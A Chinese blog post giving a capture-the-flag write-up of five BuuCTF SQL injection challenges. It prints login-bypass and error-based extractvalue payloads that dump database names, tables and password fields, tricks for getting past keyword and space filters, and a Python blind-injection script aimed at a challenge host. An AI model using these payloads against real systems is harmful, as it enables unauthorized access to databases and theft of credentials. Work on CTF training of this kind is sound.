BuuCTF 极客大挑战SQL注入 WriteUP

最新推荐文章于 2024-04-19 18:32:25 发布
最新推荐文章于 2024-04-19 18:32:25 发布
阅读量347 收藏 1
点赞数 1
分类专栏: CTF SQL注入 文章标签: mysql unctf 安全 sql 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45924653/article/details/118641735
版权

极客大挑战EasySQL

直接万能密码 1‘ or 1=1 #得到flag

在这里插入图片描述

极客大挑战 lovesql

报错注入获取数据库名 geek

' or extractvalue(1,concat('~',database())) #

在这里插入图片描述
获取表名 geekuser l0ve1ysql1

' and extractvalue(1,concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema="geek"))) #

在这里插入图片描述
获取字段名 id username password

' and extractvalue(1,concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_name="l0ve1ysq1"))) #

在这里插入图片描述

' and extractvalue(1,concat(0x7e, (select concat_ws(0x7e,id,username,password) from geek.l0ve1ysq1 where id='1'))) #

在这里插入图片描述
试了几个id没有flag拿burp抓包爆破
在这里插入图片描述
id=16时发现相应包中有flag
在这里插入图片描述
在这里插入图片描述
flag在password字段中id和username我们就不要了

' and extractvalue(1,concat(0x7e, (select password from geek.l0ve1ysq1 where id='16'))) #

在这里插入图片描述
flag没有显示完全我们可以使用substr()函数

' and extractvalue(1, concat(0x7e, (select substr(password,15,30) from geek.l0ve1ysq1 where id='16'))) #

在这里插入图片描述
拼接flag得到flag{62da5cdb-c71f-4cbd-afdd-cdcd052b610c2d}

极客大挑战 babysql

题目中说有严格的过滤,我们先进行fuzz测试
在这里插入图片描述
726全部都让过滤了

在这里插入图片描述
由于or被过滤了使用双写绕过

' oorr extractvalue(1,concat(0x7e,  database())) #

在这里插入图片描述
爆表注意过滤双写绕过

' oorr extractvalue(1,concat(0x7e, (selselectect group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema="geek"))) #

在这里插入图片描述
查看了geekuser表

' oorr extractvalue(1,concat(0x7e, (selselectect group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name="geekuser"))) #

在这里插入图片描述

' oorr extractvalue(1,concat(0x7e, (selselectect group_concat(username,passwoorrd) frfromom geek.geekuser whwhereere id='1'))) #

在这里插入图片描述
字段没有显示完全,用substr函数注意需要双写

' oorr extractvalue(1,concat(0x7e, (selselectect subsubstrstr(passwoorrd,10,30) frfromom geek.geekuser whwhereere id='1'))) #

拼接后得 admin5bf5573805b45b32b674d8426739cac4
尝试登陆后没有flag

在这里插入图片描述
尝试另一个表

' oorr extractvalue(1,concat(0x7e, (selselectect group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name="b4bsql"))) #

字段名还是 id username password

' oorr extractvalue(1,concat(0x7e, (selselectect concat_ws(0x7e,id,username,passwoorrd) frfromom geek.b4bsql whwhereere id='1'))) #

在这里插入图片描述
继续抓包控制id
id=8发现了flag字段

在这里插入图片描述

' oorr extractvalue(1,concat(0x7e, (selselectect passwoorrd frfromom geek.b4bsql whwhereere id='8'))) #

在这里插入图片描述
继续使用substr拼接得到flag{7e066331-6279-4d9a-b3ac-89975e191077}
也可以使用left() right()函数

极客大挑战HardSQL

重点:过滤空格使用括号代替
fuzz测试
在这里插入图片描述

'or(extractvalue(1,concat(0x7e,database())))#

得到geek库,跟之前的几道题都相同

'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)
where(table_schema)like("geek")))))#

只有一张H4rDsq1表

'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)
where(table_name)like("H4rDsq1")))))#

还是三个字段id username password

'or(extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1)where(id)like('1')))))#

在这里插入图片描述
flag{2c865432-7ec2-4a99-af83-dc
substr函数过滤了用right()函数

'or(extractvalue(1,concat(0x7e,(select(right(password,15))from(geek.H4rDsq1)where(id)like('1')))))#

拿到flag{2c865432-7ec2-4a99-af83-dc9608b9ac7f}

极客大挑战FinalSQL

根据提示可以知道,本题使用盲注,用python跑就完了
如果id超出了范围,那就是ERROR!!! 表示语法是正确的
如果id输入违法,那就是Error! 表示语法错误

import requests

def attack_database():
    name = ""
    url_load = "http://a6fde7aa-ddb8-435a-8131-c3b750065b8b.node4.buuoj.cn/search.php?id="
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low<high:
            payload = "1^(ascii(substr(database(),%d,1))>%d)#"%(i,mid)
            s = requests.session()
            url = url_load + payload
            r = s.get(url)
            if "ERROR" in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low+high)//2
        if mid == 32:
            break

        name = name + chr(mid)
    print("database_name: " + name)

def attack_table():
    name = ""
    url_load = "http://a6fde7aa-ddb8-435a-8131-c3b750065b8b.node4.buuoj.cn/search.php?id="
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low<high:
            payload = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)#"%(i,mid)
            s = requests.session()
            url = url_load + payload
            r = s.get(url)
            if "ERROR" in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low+high)//2
        if mid == 32:
            break

        name = name + chr(mid)
    print("table_name: " + name)

def attack_columns():
    name = ""
    url_load = "http://a6fde7aa-ddb8-435a-8131-c3b750065b8b.node4.buuoj.cn/search.php?id="
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low<high:
            payload = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='F1naI1y'),%d,1))>%d)#"%(i,mid)
            s = requests.session()
            url = url_load + payload
            r = s.get(url)
            if "ERROR" in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low+high)//2
        if mid == 32:
            break

        name = name + chr(mid)
    print("column: " + name)

def attack_flag():
    name = ""
    url_load = "http://a6fde7aa-ddb8-435a-8131-c3b750065b8b.node4.buuoj.cn/search.php?id="
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low<high:
            payload = "1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)#"%(i,mid)
            s = requests.session()
            url = url_load + payload
            r = s.get(url)
            if "ERROR" in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low+high)//2
        if mid == 32:
            break

        name = name + chr(mid)
    print("flag: " + name)

在这里插入图片描述

因为热爱所以坚持!

c7ay.
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web漏洞挖掘快速入门1
08-08
3. 通过 zmpap 全网爆破查询真实 ip(可靠) 4. 子域名爆破,现在越来越不靠谱了 5. 通过扫描出网站测试文件如 phpinfo,test 等配置文
CTF学习笔记——SQL注入
xuanyulevel6的博客
08-25 4784
以pikachu靶场练习来学习ctf知识
BUUCTF关于sql注入的题目
最新发布
2302_80935968的博客
04-19 790
测试的时候输入了 1’ and ‘1’='1这个有问题的payload,看报错信息中带有一个 and password=‘1’ and ‘1’=1 说明sql语句是SELECT * FROM tables WHERE username=‘1’ and ‘1’=1 and password=‘1’ and ‘1’=1 类似这样的查询,and 的两边同时为TRUE 结果才能为 TRUE,所以输入的payload一定要符合这个条件就可以登录成功了。(select 输入数据 || flag from Flag)
BUGkuCTF
bigbigworld666的博客
06-26 1360
BUGkuCTF (一)WEB (1)web2 进入环境,首先看源码,在里面直接找到flag [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-97sg5F09-1593143273882)(file:///C:/Users/HP/AppData/Local/Temp/msohtmlclip1/01/clip_image002.gif)] (2)计算器 首先输入数字发现只能输入1个,所以F12去修改源码,将maxlength修改,然后填入正确数字即可出现flag [外链图片转存失
SQL注入CTF练习题WriteUp——“百度杯”CTF比赛 九月场SQL
Fighting_hawk的博客
05-17 3481
1. 本题关键在于关键字的绕过,需要耐心+细心,一个个尝试。 2. 同时在练习过程中多记录累积一些绕过的方法,比如这一道题的。
Nexus Repository Manager 3 远程命令执行漏洞 CVE-2019-7238 漏洞复现
ADummy的博客
03-03 324
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238) by ADummy 0x00利用路线 ​ ysoserial生成payload—>上传给网站进行解析—>命令执行 0x01漏洞介绍 ​ SNexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将
CTFShow-周末大挑战parse-url篇Writeup
05-19
这篇Writeup主要涉及的是CTF(Capture The Flag)挑战中的Web安全领域,特别是URL解析漏洞的利用。CTF是一项网络安全竞赛,参与者通过解谜、破解密码等方式获取“国旗”(Flag),在这里指的是挑战的答案或关键信息...
江苏科技大学校赛JUSTCTF个人writeup
01-17
"CTF 竞赛Writeup" CTF 竞赛是指 Capture The Flag 竞赛,是一种主要面向网络安全和编程爱好者的竞赛。JUSTCTF 是江苏科技大学举办的 CTF 竞赛,本文将对该竞赛的题目进行总结和解析。 一、直接 flag 直接 flag ...
writeup:CTF挑战撰写
05-28
欢迎阅读我们的文章! 自2018年以来,r3kapig是一个统一的CTF团队,主要来自Eur3kA和FlappyPig。 r3kapig是可以烧烤和烧烤的美味佳肴,团队... :GeekPwn云上挑战赛 20201020-n1ctf :N1CTF 2020撰写 20210111-rwctf-
2023 强网杯 Writeup
01-29
2023 强网杯 Writeup 是一篇关于 Capture The Flag(CTF)的 writeup,内容涵盖了多个挑战题目,涉及到 Python、 Cryptography、Reverse Engineering、Web 等多个领域。下面是对每个挑战题目的详细分析和知识点总结...
Venom-2021-强网拟态防御国际精英挑战赛-WriteUp1
08-03
Venom-2021-强网拟态防御国际精英挑战赛-WriteUp1 本篇WriteUp主要介绍了Venom-2021强网拟态防御国际精英挑战赛中的一个Web挑战题,涉及到Node.js、Express框架、JavaScript、Crypto库、Cookie会话等技术。下面我们...
Exp9 Web安全实践基础 20154328 常城
weixin_30509393的博客
05-23 223
Exp9 Web安全基础实践 一、基础问题回答 1. SQL注入攻击原理,如何防御? SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL命令的目的。 对于SQL注入攻击的防范,主要还是从代码上入手: 采用预编译语句集PreparedStatement,它内置了处理SQL注入的能力,只要使用它的setXXX方法传值即可。它的...
PostgreSQL 高权限命令执行漏洞 CVE-2019-9193 漏洞复现
ADummy的博客
03-07 488
PostgreSQL 高权限命令执行漏洞(CVE-2019-9193) by ADummy 0x00利用路线 ​ 连接到数据库,直接命令执行 0x01漏洞介绍 ​ PostgreSQL 是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。 影响版本 PostgreSQL < 11 0x02漏洞复现 环境启动后,将开启Postgres默认的5432端口,默认账号密码为postgres/pos
ECShop 2.x / 3.x SQL注入/远程执行代码漏洞 xianzhi-2017-02-82239600 漏洞复现
ADummy的博客
02-24 757
ECShop 2.x / 3.x SQL注入/远程执行代码漏洞 by ADummy 0x00利用路线 ​ Burpsuite抓包—>脚本生成poc—>Burpsuite修改referer字段—>有回显 0x01漏洞介绍 ​ ECShop是一个B2C独立商店系统,供公司和个人快速建立个性化的在线商店。该系统是基于PHP语言和MYSQL数据库体系结构的跨平台开源程序。在2017年及之前的版本中,存在一个SQL注入漏洞,该漏洞可能会注入有效载荷并最终导致代码执行漏洞。最新版本的3.6.0
限制会话id服务端不共享_【干货分享】Web安全漏洞深入分析及其安全编码
weixin_39930276的博客
12-19 375
阅读:13,003超全Web漏洞详解及其对应的安全编码规则,包括:SQL注入、XSS、CSRF、文件上传、路径遍历、越权、XML以及业务安全等,实例告诉你各个漏洞对应的编码规则。给你的代码加把安全锁!一、Web安全基础1.1常见的Web安全漏洞1.2安全编码原则一切输入都是有害的!!!输出也不安全!输入:传参,cookie、session、http header、数据库……输出:异常信息、敏感...
实验吧-简单的sql注入3 Writeup
baynk的博客
07-29 340
继续继续 过程 输入1,然后发现只有一个hello。。。好吧,肯定得盲注了,先试试闭合吧,果然还是单引号的,但是居然有报错信息,应该也可以使用报错注入吧。 然后再尝试干掉单引号的时候意外发现#居然可以用了,这真是省了不少事。。 想来想去还是使用报错注入,盲注还是交给sqlmap来解决吧。先来搞库名,用的floor(),结果来这么一出。 don't到底是个啥,又换了两种其他的报错,updatexm...
[网络安全提高篇] 一〇五.SQL注入之揭秘Oracle数据库注入漏洞和致命问题(联合Cream老师)
杨秀璋的专栏
03-24 6582
前文带领大家搭建一个Oracle+phpStudy本地网络渗透靶场,并应用SQL注入、XSS攻击、文件上传漏洞三个场景。这篇文章将跟着Cream老师兼好友学习,结合自己的经验详细介绍Oracle数据库注入漏洞和致命问题,包括各种类型的注入知识。注入漏洞是安全威胁中比较常见的漏洞,Oracle也是用得最广的数据库,希望这篇文章对您有帮助。真心觉得Cream老师讲解非常厉害,且看且珍惜。
mysql注入万能密码_Natas14 Writeup(sql注入sql万能密码)
weixin_39861255的博客
02-07 214
Natas14:是一个登录页面。源码如下。if(array_key_exists("username", $_REQUEST)) {$link = mysql_connect('localhost', 'natas14', '');mysql_select_db('natas14', $link);$query = "SELECT * from users where username=\"".$...
SQL注入漏洞详解
墨痕诉清风的博客
08-09 9347
" 预先编译好,也就是SQL引擎会预先进行语法分析,产生语法树,生成执行计划,也就是说,后面你输入的参数,无论你输入的是什么,都不会影响该SQL语句的语法结构了,因为语法分析已经完成了,而语法分析主要是分析SQL命令,比如 select、from 、where 、and、 or 、order by 等等。在这里,我们使用了占位符的方式,将该SQL传入prepare函数后,预处理函数就会得到本次查询语句的SQL模板类,并将这个模板类返回,模板可以防止传那些危险变量改变本身查询语句的语义。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值